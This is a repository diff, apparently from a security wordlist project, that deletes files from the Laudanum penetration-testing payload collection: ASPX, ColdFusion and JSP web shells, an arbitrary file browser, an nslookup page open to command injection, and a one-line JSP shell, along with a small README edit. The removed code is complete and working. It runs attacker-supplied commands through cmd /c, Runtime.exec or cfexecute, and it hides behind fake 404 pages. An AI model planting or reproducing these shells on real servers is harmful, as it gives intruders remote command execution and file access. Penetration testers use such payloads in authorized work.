-        }
-        if (!validType)
-            qType = "Any";
-    }
-    
-    
-	if (Request.Form["query"] != null) 
-    {
-        string query = Request.Form["query"].Replace("  ", string.Empty).Replace("  ", string.Empty);
-        
-        if(query.Length > 0)
-        {
-            System.Diagnostics.ProcessStartInfo procStartInfo = new System.Diagnostics.ProcessStartInfo("nslookup", "-type=" + qType + " " + query);
-            // The following commands are needed to redirect the standard output and standard error.
-		    procStartInfo.RedirectStandardOutput = true;
-		    procStartInfo.RedirectStandardError = true;
-		    procStartInfo.UseShellExecute = false;
-            
-            // Do not create the black window.
-		    procStartInfo.CreateNoWindow = true;
-
-            // Now we create a process, assign its ProcessStartInfo and start it
-            System.Diagnostics.Process p = new System.Diagnostics.Process();
-            p.StartInfo = procStartInfo;
-            p.Start();
-            // Get the output and error into a string
-            stdout = p.StandardOutput.ReadToEnd();
-            stderr = p.StandardError.ReadToEnd();
-        }
-	}
-}
-</script>
-<form method="post">
-QUERY: <input type="text" name="query"/><br />
-Type: <select name="type">
-<%
-    foreach (string s in qtypes)
-    {
-        Response.Write("<option value=\"" + s + "\">" + s + "</option>");
-    }
-     %>
-</select>
-<input type="submit"><br/>
-STDOUT:<br/>
-<pre><% = stdout.Replace("<", "&lt;") %></pre>
-<br/>
-<br/>
-<br/>
-STDERR:<br/>
-<pre><% = stderr.Replace("<", "&lt;") %></pre>
-</body>
-</html>
-

Payloads/laudanum-0.8/aspx/file.aspx

@@ -1,154 +0,0 @@
-<%@ Page Language="C#"%>
-<%@ Import Namespace="System" %>
-<html><head><title>Laudanum - File</title></head><body>
-<script runat="server">
-
-    /* *****************************************************************************
-***
-*** Laudanum Project
-*** A Collection of Injectable Files used during a Penetration Test
-***
-*** More information is available at:
-***  http://laudanum.secureideas.com
-***  laudanum@secureideas.com
-***
-***  Project Leads:
-***         Kevin Johnson <kevin@secureideas.com>
-***
-*** Copyright 2012 by Kevin Johnson and the Laudanum Team
-***
-********************************************************************************
-***
-*** This file allows browsing of the file system
-*** Written by James Jardine <james@secureideas.com>
-***
-********************************************************************************
-*** This program is free software; you can redistribute it and/or
-*** modify it under the terms of the GNU General Public License
-*** as published by the Free Software Foundation; either version 2
-*** of the License, or (at your option) any later version.
-***
-*** This program is distributed in the hope that it will be useful,
-*** but WITHOUT ANY WARRANTY; without even the implied warranty of
-*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-*** GNU General Public License for more details.
-***
-*** You can get a copy of the GNU General Public License from this
-*** address: http://www.gnu.org/copyleft/gpl.html#SEC1
-*** You can also write to the Free Software Foundation, Inc., 59 Temple
-*** Place - Suite 330, Boston, MA  02111-1307, USA.
-********************************************************************************* */
-
-    // ********************* Config entries below ***********************************
-// IPs are enterable as individual addresses  
-string[] allowedIPs = new string[3] {"::1", "192.168.1.1","127.0.0.1"};
-
-// ***************** No editable content below this line **************************
-bool allowed = false;
-string dir = "";
-string file = "";
-
-void Page_Load(object sender, System.EventArgs e)
-{
-
-    foreach (string ip in allowedIPs)
-    {
-        if (HttpContext.Current.Request.ServerVariables["REMOTE_ADDR"] == ip)
-        {
-            allowed = true;
-        }
-    }
-
-    if (!allowed)
-    {
-        die();
-    }
-
-    //dir = Request.QueryString["dir"] != null ? Request.QueryString["dir"] : Environment.SystemDirectory;
-    dir = Request.QueryString["dir"] != null ? Request.QueryString["dir"] : Server.MapPath(".");
-    file = Request.QueryString["file"] != null ? Request.QueryString["file"] : "";
-
-    if (file.Length > 0)
-    {
-        if (System.IO.File.Exists(file))
-        {
-            writefile();
-        }
-    }
-}
-
-void writefile()
-{
-    Response.ClearContent();
-    Response.Clear();
-    Response.ContentType = "text/plain";
-    //Uncomment the next line if you would prefer to download the file vs display it.
-    //Response.AddHeader("Content-Disposition", "attachment; filename=" + file + ";");
-    Response.TransmitFile(file);
-    Response.Flush();
-    Response.End();
-}
-    
-void die() {
-	//HttpContext.Current.Response.Clear();
-	HttpContext.Current.Response.StatusCode = 404;
-	HttpContext.Current.Response.StatusDescription = "Not Found";
-	HttpContext.Current.Response.Write("<h1>404 Not Found</h1>");
-	HttpContext.Current.Server.ClearError();
-	HttpContext.Current.Response.End();
-}
-
-
-</script>
-<html>
-<head></head>
-<% string[] breadcrumbs = dir.Split('\\');
-   string breadcrumb = "";
-   foreach (string b in breadcrumbs)
-   {
-       if (b.Length > 0)
-       {
-           breadcrumb += b + "\\";
-           Response.Write("<a href=\"" + "file.aspx" + "?dir=" + Server.UrlEncode(breadcrumb) + "\">" + Server.HtmlEncode(b) + "</a>");
-           Response.Write(" / ");
-       }
-   }
-    %>
-<table>
-<tr><th>Name</th><th>Date</th><th>Size</th></tr>
-<%
-    try
-    {
-        if (System.IO.Directory.Exists(dir))
-        {
-            string[] folders = System.IO.Directory.GetDirectories(dir);
-            foreach (string folder in folders)
-            {
-                Response.Write("<tr><td><a href=\"" + "file.aspx" + "?dir=" + Server.UrlEncode(folder) + "\">" + Server.HtmlEncode(folder) + "</a></td><td></td><td></td></tr>");
-            }
-        }
-        else
-        {
-            Response.Write("This directory doesn't exist: " + Server.HtmlEncode(dir));
-            Response.End();
-        }
-        
-    }
-    catch (System.UnauthorizedAccessException ex)
-    {
-        Response.Write("You Don't Have Access to this directory: " + Server.HtmlEncode(dir));
-        Response.End();
-    }
-     %>
-
-<%
-    System.IO.DirectoryInfo di = new System.IO.DirectoryInfo(dir);
-    System.IO.FileInfo[] files = di.GetFiles();
-    foreach (System.IO.FileInfo f in files)
-    {
-        Response.Write("<tr><td><a href=\"" + "file.aspx" + "?dir=" + Server.UrlEncode(dir) + "&file=" + Server.UrlEncode(f.FullName) + "\">" + Server.HtmlEncode(f.Name) + "</a></td><td>" + f.CreationTime.ToString() + "</td><td>" + f.Length.ToString() + "</td></tr>");
-    }
-     %>
-     </table>
-     </body>
-</html>

Payloads/laudanum-0.8/aspx/shell.aspx

@@ -1,129 +0,0 @@
-<%@ Page Language="C#"%>
-<%@ Import Namespace="System" %>
-
-<script runat="server">
-
-/* *****************************************************************************
-***
-*** Laudanum Project
-*** A Collection of Injectable Files used during a Penetration Test
-***
-*** More information is available at:
-***  http://laudanum.secureideas.net
-***  laudanum@secureideas.net
-***
-***  Project Leads:
-***         Kevin Johnson <kjohnson@secureideas.net>
-***         Tim Medin <tim@securitywhole.com>
-***
-*** Copyright 2012 by Kevin Johnson and the Laudanum Team
-***
-********************************************************************************
-***
-*** This file provides shell access to the system.
-***
-********************************************************************************
-*** This program is free software; you can redistribute it and/or
-*** modify it under the terms of the GNU General Public License
-*** as published by the Free Software Foundation; either version 2
-*** of the License, or (at your option) any later version.
-***
-*** This program is distributed in the hope that it will be useful,
-*** but WITHOUT ANY WARRANTY; without even the implied warranty of
-*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-*** GNU General Public License for more details.
-***
-*** You can get a copy of the GNU General Public License from this
-*** address: http://www.gnu.org/copyleft/gpl.html#SEC1
-*** You can also write to the Free Software Foundation, Inc., 59 Temple
-*** Place - Suite 330, Boston, MA  02111-1307, USA.
-***
-***************************************************************************** */
-
-string stdout = "";
-string stderr = "";
-
-void die() {
-	//HttpContext.Current.Response.Clear();
-	HttpContext.Current.Response.StatusCode = 404;
-	HttpContext.Current.Response.StatusDescription = "Not Found";
-	HttpContext.Current.Response.Write("<h1>404 Not Found</h1>");
-	HttpContext.Current.Server.ClearError();
-	HttpContext.Current.Response.End();
-}
-
-void Page_Load(object sender, System.EventArgs e) {
-
-	// Check for an IP in the range we want
-	string[] allowedIps = new string[] {"::1","192.168.0.1", "127.0.0.1"};
-	
-	// check if the X-Fordarded-For header exits
-	string remoteIp;
-	if (HttpContext.Current.Request.Headers["X-Forwarded-For"] == null) {
-		remoteIp = Request.UserHostAddress;
-	} else {
-		remoteIp = HttpContext.Current.Request.Headers["X-Forwarded-For"].Split(new char[] { ',' })[0]; 
-	}
-
-	bool validIp = false;
-	foreach (string ip in allowedIps) {
-		validIp = (validIp || (remoteIp == ip));
-	}
-	
-	if (!validIp) {
-		die();
-	}
-	
-	if (Request.Form["c"] != null) {
-	// do or do not, there is no try
-	//try {
-		// create the ProcessStartInfo using "cmd" as the program to be run, and "/c " as the parameters.
-		// "/c" tells cmd that we want it to execute the command that follows, and exit.
-		System.Diagnostics.ProcessStartInfo procStartInfo = new System.Diagnostics.ProcessStartInfo("cmd", "/c " + Request.Form["c"]);
-
-		// The following commands are needed to redirect the standard output and standard error.
-		procStartInfo.RedirectStandardOutput = true;
-		procStartInfo.RedirectStandardError = true;
-		procStartInfo.UseShellExecute = false;
-		// Do not create the black window.
-		procStartInfo.CreateNoWindow = true;
-		// Now we create a process, assign its ProcessStartInfo and start it
-		System.Diagnostics.Process p = new System.Diagnostics.Process();
-		p.StartInfo = procStartInfo;
-		p.Start();
-		// Get the output and error into a string
-		stdout = p.StandardOutput.ReadToEnd();
-		stderr = p.StandardError.ReadToEnd();
-	//}
-	//catch (Exception objException)
-	//{
-	}
-}
-</script>
-<html>
-<head><title>Laundanum ASPX Shell</title></head>
-<body onload="document.shell.c.focus()">
-
-<form method="post" name="shell">
-cmd /c <input type="text" name="c"/>
-<input type="submit"><br/>
-STDOUT:<br/>
-<pre><% = stdout.Replace("<", "&lt;") %></pre>
-<br/>
-<br/>
-<br/>
-STDERR:<br/>
-<pre><% = stderr.Replace("<", "&lt;") %></pre>
-
-
-</form>
-
-  <hr/>
-  <address>
-  Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
-  Written by Tim Medin.<br/>
-  Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
-  </address>
-
-</body>
-</html>

Payloads/laudanum-0.8/cfm/shell.cfm

@@ -1,80 +0,0 @@
-<cfapplication scriptProtect="none">
-<!---
-/* *****************************************************************************
-***
-*** Laudanum Project
-*** A Collection of Injectable Files used during a Penetration Test
-***
-*** More information is available at:
-***  http://laudanum.secureideas.net
-***  laudanum@secureideas.net
-***
-***  Project Leads:
-***         Kevin Johnson <kjohnson@secureideas.net
-***         Tim Medin <tim@securitywhole.com>
-***
-*** Copyright 2012 by Kevin Johnson and the Laudanum Team
-***
-********************************************************************************
-***
-*** This file provides access to shell acces on the system.
-*** Modified by Tim Medin
-***
-********************************************************************************
-***
-*** TODO: Fix the problem with quotes
-***       Add authentication
-***
-********************************************************************************
-*** This program is free software; you can redistribute it and/or
-*** modify it under the terms of the GNU General Public License
-*** as published by the Free Software Foundation; either version 2
-*** of the License, or (at your option) any later version.
-***
-*** This program is distributed in the hope that it will be useful,
-*** but WITHOUT ANY WARRANTY; without even the implied warranty of
-*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-*** GNU General Public License for more details.
-***
-*** You can get a copy of the GNU General Public License from this
-*** address: http://www.gnu.org/copyleft/gpl.html#SEC1^
-*** You can also write to the Free Software Foundation, Inc., 59 Temple
-*** Place - Suite 330, Boston, MA  02111-1307, USA.
-***
-***************************************************************************** */
---->
-<cfif #cgi.remote_addr# neq "1.1.1.1">
-    <cfheader statuscode="404" statustext="Page Not Found" />
-    <cfabort />
-</cfif>
-
-<html>
-<head><title>Laudanum Coldfusion Shell</title></head>
-<body>
-<form action="shell.cfm" method="POST">
-<cfif IsDefined("form.cmd")>
-Executable: <Input type="text" name="cmd" value="<cfoutput>#HTMLEditFormat(form.cmd)#</cfoutput>"> For Windows use: cmd.exe or the full path to cmd.exe<br>
-Arguments: <Input type="text" name="arguments" value="<cfoutput>#HTMLEditFormat(form.arguments)#</cfoutput>"> For Windows use: /c <i>command</i><br>
-<cfelse>
-Executable: <Input type="text" name="cmd" value="cmd.exe"><br>
-Arguments: <Input type="text" name="arguments" value="/c "><br>
-</cfif>
-<input type="submit">
-</form>
-
-<cfif IsDefined("form.cmd")>
-<pre>
-<cfexecute name="#Replace(preservesinglequotes(form.cmd), QuoteMark, DoubleQuoteMark, 'All')#" arguments="#Replace(preservesinglequotes(form.arguments), QuoteMark, DoubleQuoteMark, 'All')#" timeout="5" variable="foo"></cfexecute>
-<cfoutput>#Replace(foo, "<", "&lt;", "All")#</cfoutput>
-</pre>
-</cfif>
-Note: The cold fusion command that executes shell commands strips quotes, both double and single, so be aware.
-
-  <hr/>
-  <address>
-  Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
-  Written by Tim Medin.<br/>
-  Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
-  </address>
-</body>
-</html>

Payloads/laudanum-0.8/jsp/warfiles/META-INF/MANIFEST.MF

@@ -1,3 +0,0 @@
-Manifest-Version: 1.0
-Created-By: 1.6.0_10 (Sun Microsystems Inc.)
-

Payloads/laudanum-0.8/jsp/warfiles/WEB-INF/web.xml

@@ -1,11 +0,0 @@
-<?xml version="1.0" ?>
-<web-app xmlns="http://java.sun.com/xml/ns/j2ee"
-xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
-xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee
-http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd"
-version="2.4">
-<servlet>
-<servlet-name>Command</servlet-name>
-<jsp-file>/cmd.jsp</jsp-file>
-</servlet>
-</web-app>

Payloads/laudanum-0.8/jsp/warfiles/cmd.jsp

@@ -1,41 +0,0 @@
-<%@ page import="java.util.*,java.io.*"%>
-<%
-
-if (request.getRemoteAddr() != "4.4.4.4") {
-	response.sendError(HttpServletResponse.SC_NOT_FOUND)
-	return;
-}
-
-%>
-<HTML>
-<TITLE>Laudanum JSP Shell</TITLE>
-<BODY>
-Commands with JSP
-<FORM METHOD="GET" NAME="myform" ACTION="">
-<INPUT TYPE="text" NAME="cmd">
-<INPUT TYPE="submit" VALUE="Send"><br/>
-If you use this against a Windows box you may need to prefix your command with cmd.exe /c
-</FORM>
-<pre>
-<%
-if (request.getParameter("cmd") != null) {
-out.println("Command: " + request.getParameter("cmd") + "<BR>");
-Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
-OutputStream os = p.getOutputStream();
-InputStream in = p.getInputStream();
-DataInputStream dis = new DataInputStream(in);
-String disr = dis.readLine();
-while ( disr != null ) {
-out.println(disr);
-disr = dis.readLine();
-}
-}
-%>
-</pre>
-<hr/>
-<address>
-Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
-Written by Tim Medin.<br/>
-Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
-</address>
-</BODY></HTML>

Payloads/simple_shell.jsp

@@ -1,3 +0,0 @@
-+<% 
-+Runtime.getruntime().exec(request.getParameter("cmd")) 
-+%>

README.md

@@ -49,4 +49,4 @@ This project is licensed under the MIT license.
 
 ![MIT License](https://img.shields.io/github/license/mashape/apistatus.svg)
 
-:boom: <sup><sub>NOTE: Downloading this repository is likely to cause a false-positive alarm by your antivirus or antimalware software, the filepath should be whitelisted. There is nothing in Seclists or FuzzDB that can harm your computer as-is, however it's not recommended to store these files on a server or other important system due to the risk of local file include attacks.</sup></sub>
+:boom: <sup>NOTE: Downloading this repository is likely to cause a false-positive alarm by your antivirus or antimalware software, the filepath should be whitelisted. There is nothing in Seclists or FuzzDB that can harm your computer as-is, however it's not recommended to store these files on a server or other important system due to the risk of local file include attacks.</sup>